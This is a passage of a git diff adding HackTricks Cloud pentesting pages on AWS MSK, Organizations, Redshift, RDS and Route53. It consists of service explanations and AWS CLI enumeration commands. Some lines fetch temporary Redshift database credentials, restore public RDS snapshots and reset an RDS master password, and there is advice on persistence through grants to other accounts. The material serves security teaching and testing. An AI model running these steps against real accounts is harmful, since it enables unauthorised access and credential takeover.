+[aws-msk-privesc.md](../aws-privilege-escalation/aws-msk-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md" %}
+[aws-msk-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Persistence
+
+If you are going to **have access to the VPC** where a Provisioned Kafka is, you could **enable unauthorised access**, if **SASL/SCRAM authentication**, **read** the password from the secret, give some **other controlled user IAM permissions** (if IAM or serverless used) or persist with **certificates**.
+
+## References
+
+* [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md
new file mode 100644
index 0000000000..06598159d9
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md
@@ -0,0 +1,73 @@
+# AWS - Organizations Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Baisc Information
+
+AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization.
+
+Key Points:
+
+* **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges.
+* **Resource Allocation**: It simplifies the process of allocating resources across the accounts.
+* **Account Grouping**: Accounts can be grouped together, making management more streamlined.
+* **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization.
+
+You can find more information in:
+
+{% content-ref url="../aws-basic-information/" %}
+[aws-basic-information](../aws-basic-information/)
+{% endcontent-ref %}
+
+```bash
+# Get Org
+aws organizations describe-organization
+aws organizations list-roots
+
+# Get OUs, from root and from other OUs
+aws organizations list-organizational-units-for-parent --parent-id r-lalala
+aws organizations list-organizational-units-for-parent --parent-id ou-n8s9-8nzv3a5y
+
+# Get accounts
+## List all the accounts without caring about the parent
+aws organizations list-accounts
+## Accounts from a parent
+aws organizations list-accounts-for-parent --parent-id r-lalala
+aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y
+
+# Get basic account info
+## You need the permission iam:GetAccountSummary
+aws iam get-account-summary
+```
+
+## References
+
+* https://aws.amazon.com/organizations/
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
new file mode 100644
index 0000000000..13db530f05
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
@@ -0,0 +1,50 @@
+# AWS - Other Services Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Directconnect
+
+Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network).
+
+```
+aws directconnect describe-connections
+aws directconnect describe-interconnects
+aws directconnect describe-virtual-gateways
+aws directconnect describe-virtual-interfaces
+```
+
+## Support
+
+In AWS you can access current and previous support cases via the API
+
+```
+aws support describe-cases --include-resolved-cases
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md b/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
new file mode 100644
index 0000000000..3580f80fda
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
@@ -0,0 +1,125 @@
+# AWS - Redshift Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Amazon Redshift
+
+Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business.
+
+**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. When you have an unencrypted cluster, it can't be encrypted.
+
+Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**.
+
+### KMS
+
+During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective.
+
+The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS.
+
+This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory.
+
+Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory.
+
+This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database.
+
+You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3.
+
+### CloudHSM
+
+<details>
+
+<summary>Using Redshift with CloudHSM</summary>
+
+When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates.
+
+This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition.
+
+You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition.
+
+If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised.
+
+During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'.
+
+</details>
+
+### Enumeration
+
+```bash
+# Get clusters
+aws redshift describe-clusters
+## Get if publicly accessible
+aws redshift describe-clusters | jq -r ".Clusters[].PubliclyAccessible"
+## Get DB username to login
+aws redshift describe-clusters | jq -r ".Clusters[].MasterUsername"
+## Get endpoint
+aws redshift describe-clusters | jq -r ".Clusters[].Endpoint"
+## Public addresses of the nodes
+aws redshift describe-clusters | jq -r ".Clusters[].ClusterNodes[].PublicIPAddress"
+## Get IAM roles of the clusters
+aws redshift describe-clusters | jq -r ".Clusters[].IamRoles"
+
+# Endpoint access & authorization
+aws redshift describe-endpoint-access
+aws redshift describe-endpoint-authorization
+
+# Get credentials
+aws redshift get-cluster-credentials --db-user <username> --cluster-identifier <cluster-id>
+## By default, the temporary credentials expire in 900 seconds. You can optionally specify a duration between 900 seconds (15 minutes) and 3600 seconds (60 minutes).
+aws redshift get-cluster-credentials-with-iam --cluster-identifier <cluster-id>
+## Gives creds to access redshift with the IAM redshift permissions given to the current AWS account
+## More in https://docs.aws.amazon.com/redshift/latest/mgmt/redshift-iam-access-control-identity-based.html
+
+# Authentication profiles
+aws redshift describe-authentication-profiles
+
+# Snapshots
+aws redshift describe-cluster-snapshots
+
+# Scheduled actions
+aws redshift describe-scheduled-actions
+
+# Connect
+# The redshift instance must be publicly available (not by default), the sg need to allow inbounds connections to the port and you need creds
+psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U admin -d dev -p 5439
+```
+
+## Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-redshift-privesc.md" %}
+[aws-redshift-privesc.md](../aws-privilege-escalation/aws-redshift-privesc.md)
+{% endcontent-ref %}
+
+## Persistence
+
+The following actions allow to grant access to other AWS accounts to the cluster:
+
+* [authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html)
+* [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md b/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md
new file mode 100644
index 0000000000..2b1ff5644e
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md
@@ -0,0 +1,168 @@
+# AWS - Relational Database (RDS) Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+The **Relational Database Service (RDS)** offered by AWS is designed to streamline the deployment, operation, and scaling of a **relational database in the cloud**. This service offers the advantages of cost efficiency and scalability while automating labor-intensive tasks like hardware provisioning, database configuration, patching, and backups.
+
+AWS RDS supports various widely-used relational database engines including MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, and Amazon Aurora, with compatibility for both MySQL and PostgreSQL.
+
+Key features of RDS include:
+
+* **Management of database instances** is simplified.
+* Creation of **read replicas** to enhance read performance.
+* Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms.
+* **Integration** with other AWS services, such as:
+  * AWS Identity and Access Management (**IAM**) for robust access control.
+  * AWS **CloudWatch** for comprehensive monitoring and metrics.
+  * AWS Key Management Service (**KMS**) for ensuring encryption at rest.
+
+## Credentials
+
+When creating the DB cluster the master **username** can be configured (**`admin`** by default). To generate the password of this user you can:
+
+* **Indicate** a **password** yourself
+* Tell RDS to **auto generate** it
+* Tell RDS to manage it in **AWS Secret Manager** encrypted with a KMS key
+
+<figure><img src="../../../.gitbook/assets/image (144).png" alt=""><figcaption></figcaption></figure>
+
+### Authentication
+
+There are 3 types of authentication options, but using the **master password is always allowed**:
+
+<figure><img src="../../../.gitbook/assets/image (227).png" alt=""><figcaption></figcaption></figure>
+
+### Public Access & VPC
+
+By default **no public access is granted** to the databases, however it **could be granted**. Therefore, by default only machines from the same VPC will be able to access it if the selected **security group** (are stored in EC2 SG)allows it.
+
+Instead of exposing a DB instance, it’s possible to create a **RDS Proxy** which **improves** the **scalability** & **availability** of the DB cluster.
+
+Moreover, the **database port can be modified** also.
+
+### Encryption
+
+**Encryption is enabled by default** using a AWS managed key (a CMK could be chosen instead).
+
+By enabling your encryption, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**.\
+It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**.
+
+However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted.
+
+#### Transparent Data Encryption (TDE)
+
+Alongside the encryption capabilities inherent to RDS at the application level, RDS also supports **additional platform-level encryption mechanisms** to safeguard data at rest. This includes **Transparent Data Encryption (TDE)** for Oracle and SQL Server. However, it's crucial to note that while TDE enhances security by encrypting data at rest, it may also **affect database performance**. This performance impact is especially noticeable when used in conjunction with MySQL cryptographic functions or Microsoft Transact-SQL cryptographic functions.
+
+To utilize TDE, certain preliminary steps are required:
+
+1. **Option Group Association**:
+   * The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements.
+   * However, it's important to note that option groups are only available for specific database engines and versions.
+2. **Inclusion of TDE in Option Group**:
+   * Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group.
+   * It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed.
+3. **TDE Encryption Modes**:
+   * TDE offers two distinct encryption modes:
+     * **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection.
+     * **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted.
+
+Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards.
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Clusters info
+## Get Endpoints, username, port, iam auth enabled, attached roles, SG
+aws rds describe-db-clusters
+aws rds describe-db-cluster-endpoints #Cluster URLs
+aws rds describe-db-cluster-backtracks --db-cluster-identifier <cluster-name>
+
+## Cluster snapshots
+aws rds describe-db-cluster-snapshots
+
+# Get DB instances info
+aws rds describe-db-instances #username, url, port, vpc, SG, is public?
+aws rds describe-db-security-groups
+
+## Find automated backups
+aws rds describe-db-instance-automated-backups
+
+## Find snapshots
+aws rds describe-db-snapshots 
+aws rds describe-db-snapshots --include-public --snapshot-type public
+## Restore snapshot as new instance
+aws rds restore-db-instance-from-db-snapshot --db-instance-identifier <ID> --db-snapshot-identifier <ID> --availability-zone us-west-2a
+
+# Any public snapshot in the account
+aws rds describe-db-snapshots --snapshot-type public
+
+# Proxies
+aws rds describe-db-proxy-endpoints
+aws rds describe-db-proxy-target-groups
+aws rds describe-db-proxy-targets
+
+## reset credentials of MasterUsername
+aws rds modify-db-instance --db-instance-identifier <ID> --master-user-password <NewPassword> --apply-immediately
+```
+{% endcode %}
+
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md" %}
+[aws-rds-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-rds-privesc.md" %}
+[aws-rds-privesc.md](../aws-privilege-escalation/aws-rds-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-rds-post-exploitation.md" %}
+[aws-rds-post-exploitation.md](../aws-post-exploitation/aws-rds-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../aws-persistence/aws-rds-persistence.md" %}
+[aws-rds-persistence.md](../aws-persistence/aws-rds-persistence.md)
+{% endcontent-ref %}
+
+### SQL Injection
+
+There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**.
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/sql-injection" %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md
new file mode 100644
index 0000000000..96cc1cdee8
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md
@@ -0,0 +1,57 @@
+# AWS - Route53 Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Route 53
+
+Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\
+You can create https, http and tcp **health checks for web pages** via Route53.
+
+### IP-based routing <a href="#routing-policy-ipbased" id="routing-policy-ipbased"></a>
+
+This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\
+IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**.
+
+### Enumeration
+
+```bash
+aws route53 list-hosted-zones # Get domains
+aws route53 get-hosted-zone --id <hosted_zone_id>
+aws route53 list-resource-record-sets --hosted-zone-id <hosted_zone_id> # Get all records
+aws route53 list-health-checks
+aws route53 list-traffic-policies
+```
+
+### Privesc
+
+{% content-ref url="../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md" %}
+[route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md](../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md b/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md
new file mode 100644
index 0000000000..8f64145bd1
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md
@@ -0,0 +1,347 @@
+# AWS - S3, Athena & Glacier Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## S3
+
+Amazon S3 is a service that allows you **store big amounts of data**.
+
